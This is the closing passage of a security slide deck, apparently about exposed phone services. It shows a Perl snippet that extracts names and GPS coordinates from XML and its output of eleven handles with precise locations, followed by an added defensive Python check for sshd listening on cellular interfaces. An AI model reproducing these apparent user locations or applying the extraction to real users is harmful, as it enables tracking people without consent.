            my ($name,$lat,$lon) = $_ =~ qr|<name>(.*?)</name>.*?<lat>([-\d.]*)</lat><lon>([-\d.]*)</lon>|i;
            print "$lat,$lon,$name\n";
        }
  • 101. perl script output
        39.93220206723633,-77.47186584472656,poppyseed
        38.13753356933594,-77.06847380591797,Gadsden
        39.98429718017578,-78.30014190673828,Ziggety
        39.23520812988281,-77.40483581542969,Lexi
        39.855418395996094,-77.2717056274414,Tatu
        39.55705801582031,-77.4004086303711,Bigfoot
        36.67790985107422,-77.5902328491211,Jeneko
        38.297552490234375,-77.65829467773438,Stilbored
        39.891050720214844,-77.55879211025781,Timoteo
        39.66313247680664,-78.04374694824219,Gamber
        36.295310314697266,-78.14061126700984,UnderWear
  • 110. Comments/Feedback: trevor.hawthorn@stratumsecurity.com, www.stratumsecurity.com. Twitter: @packetwerks @stratumsecurity. Special Thanks: Tiago Stock
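
Added example (not part of the original slides): a Python check for the slide 71 recommendation that sshd should not bind to the pdp interfaces. It reads ifconfig output in the layout of slide 25 plus an sshd_config and reports which cellular addresses sshd would listen on; the sample inputs and function names are constructed for illustration.

```python
import ipaddress
import re

CELLULAR_PREFIX = "pdp_ip"  # cellular interface naming from the Interfaces slides

# Constructed sample, modelled on the ifconfig output of slide 25.
IFCONFIG_SAMPLE = """\
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
    inet 127.0.0.1 netmask 0xff000000
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
    inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
    inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
"""

# Constructed sshd_config samples: no ListenAddress vs. pinned to Wi-Fi and loopback.
DEFAULT_CONFIG = "Port 22\n#ListenAddress 0.0.0.0\nPermitRootLogin yes\n"
WIFI_ONLY_CONFIG = "Port 22\nListenAddress 192.168.20.1:22\nListenAddress 127.0.0.1\n"


def parse_ifconfig(text):
    """Map interface name -> list of IPv4 addresses found in ifconfig output."""
    ifaces, current = {}, None
    for line in text.splitlines():
        head = re.match(r"^(\S+?):\s+flags=", line)
        if head:
            current = head.group(1)
            ifaces[current] = []
            continue
        inet = re.match(r"^\s+inet\s+(\d+\.\d+\.\d+\.\d+)", line)
        if inet and current is not None:
            ifaces[current].append(ipaddress.ip_address(inet.group(1)))
    return ifaces


def parse_listen_addresses(config_text):
    """Return the hosts named by ListenAddress directives, with any port removed."""
    hosts = []
    for raw in config_text.splitlines():
        parts = raw.split("#", 1)[0].split()      # drop comments, then tokenize
        if len(parts) < 2 or parts[0].lower() != "listenaddress":
            continue                              # keywords are case-insensitive
        value = parts[1]
        if value.startswith("["):                 # [host]:port form
            value = value[1:].split("]", 1)[0]
        elif value.count(":") == 1:               # host:port (IPv4 or name)
            value = value.split(":", 1)[0]
        hosts.append(value)
    return hosts


def cellular_exposure(ifconfig_text, config_text):
    """List (interface, IPv4 address) pairs on cellular interfaces that sshd binds."""
    hosts = parse_listen_addresses(config_text)
    wildcard = not hosts          # no directive at all: sshd listens on every address
    listen = set()
    for host in hosts:
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            continue              # hostname: not resolved offline, review by hand
        if addr == ipaddress.ip_address("0.0.0.0"):
            wildcard = True       # explicit IPv4 wildcard
        listen.add(addr)
    exposed = []
    for name, addrs in parse_ifconfig(ifconfig_text).items():
        if name.startswith(CELLULAR_PREFIX):
            exposed += [(name, str(a)) for a in addrs if wildcard or a in listen]
    return exposed


if __name__ == "__main__":
    for label, cfg in (("default", DEFAULT_CONFIG), ("wifi-only", WIFI_ONLY_CONFIG)):
        print(label, cellular_exposure(IFCONFIG_SAMPLE, cfg))
```

Interface addresses are assigned dynamically, so a pinned ListenAddress has to be re-checked whenever the phone changes networks.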